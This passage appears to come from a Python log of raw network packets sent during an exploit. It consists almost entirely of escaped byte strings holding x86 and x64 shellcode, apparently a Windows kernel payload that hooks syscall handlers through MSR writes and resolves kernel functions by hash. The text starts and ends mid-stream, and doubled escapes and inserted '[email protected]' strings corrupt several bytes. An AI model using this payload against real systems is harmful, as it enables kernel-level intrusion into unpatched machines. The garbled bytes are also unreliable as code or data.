\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 6, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 